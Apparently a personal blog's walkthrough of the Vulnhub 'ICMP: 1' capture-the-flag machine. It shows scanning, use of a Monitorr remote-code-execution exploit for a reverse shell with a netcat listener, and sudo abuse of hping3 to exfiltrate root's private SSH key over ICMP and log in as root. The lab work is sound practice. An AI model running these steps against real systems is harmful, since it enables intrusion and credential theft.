Windy's little blog

一切生活中的杂七杂八, and I like CTF.

Vulnhub ICMP: 1 Walkthrough,633/

Scan ports, find 22 and 80.

└─$ nmap -sV -sC -p-  -oN ports.log
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))

Scan port 80.

└─$ gobuster dir -u  -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 400,403,404,500 --wildcard
/index.php (Status: 302)
/mon (Status: 301)

Open port 80 in firefox, it's a system monitor program named "Monitorr". Searchspolit show it may has vulnerability.

└─$ searchsploit monitorr           
----------------------------------------------------- ---------------------------------
 Exploit Title                        |  Path
----------------------------------------------------- ---------------------------------
Monitorr 1.7.6m - Authorization Bypass        | php/webapps/
Monitorr 1.7.6m - Remote Code Execution (Unauthentic | php/webapps/
----------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Use to get reverse shell.

└─$ python3 1234
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 44222
bash: cannot set terminal process group (498): Inappropriate ioctl for devicebash: no job control in this shell
www-data@icmp:/var/www/html/mon/assets/data/usrimg$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

In fox's home folder, find a reminder txt file, and a "devel" folder we can not enter.

www-data@icmp:/home/fox$ cd /home/fox
cd /home/fox
www-data@icmp:/home/fox$ ls -la
ls -la
total 20
drwxr-xr-x 3 root root 4096 Dec  3 16:08 .
drwxr-xr-x 3 root root 4096 Dec  3 16:04 ..
lrwxrwxrwx 1 root root    9 Dec  3 16:08 .bash_history -> /dev/null
drwx--x--x 2 fox  fox  4096 Dec  3 16:05 devel
-rw-r--r-- 1 fox  fox    33 Dec  3 16:08 local.txt
-rw-r--r-- 1 root root   78 Dec  3 16:08 reminder
www-data@icmp:/home/fox$ cat reminder
cat reminder
crypt with crypt.php: done, it works
work on decrypt with crypt.php: howto?!?

Through the note, we guess maybe there is a file named crypt.php in devel.

www-data@icmp:/home/fox$ ls -la devel/crypt.php
ls -la devel/crypt.php
-rw-r--r-- 1 fox fox 56 Dec  3 16:05 devel/crypt.php
www-data@icmp:/home/fox$ cat devel/crypt.php
cat devel/crypt.php
echo crypt('.............','da');

Now we can try to log in ssh as fox with the password. Then check sudo.

└─$ ssh fox@                                                          1 ⚙
fox@'s password: 
Linux icmp 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
Last login: Fri Mar 12 05:43:09 2021 from
$ sudo -l
[sudo] password for fox: 
Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass,
User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3

Now we need to add two terminal at victim's machine. One terminal send and one terminal receive.

Here is the first terminal. Press Ctrl+C when second terminal receive all private key data.

fox@icmp:~$ sudo hping3 --icmp -d 100 --sign signature --file /root/.ssh/id_rsa  
HPING (lo icmp mode set, 28 headers + 100 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
len=128 ip= ttl=64 id=5102 icmp_seq=0 rtt=6.6 ms
len=128 ip= ttl=64 id=8754 icmp_seq=30 rtt=2.6 ms
--- hping statistic ---
31 packets transmitted, 31 packets received, 0% packet loss
round-trip min/avg/max = 0.6/4.8/8.1 ms

Here is the second terminal.

fox@icmp:~$ sudo hping3 --icmp --listen signature --safe  
Warning: Unable to guess the output interface
hping3 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!

Now we can ssh in as root.

└─$ ssh root@ -i id_rsa                                                                                                                                                                       130 ⨯ 1 ⚙
Linux icmp 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Mar 12 05:55:54 2021 from
root@icmp:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)



Powered By Z-BlogPHP 1.7.0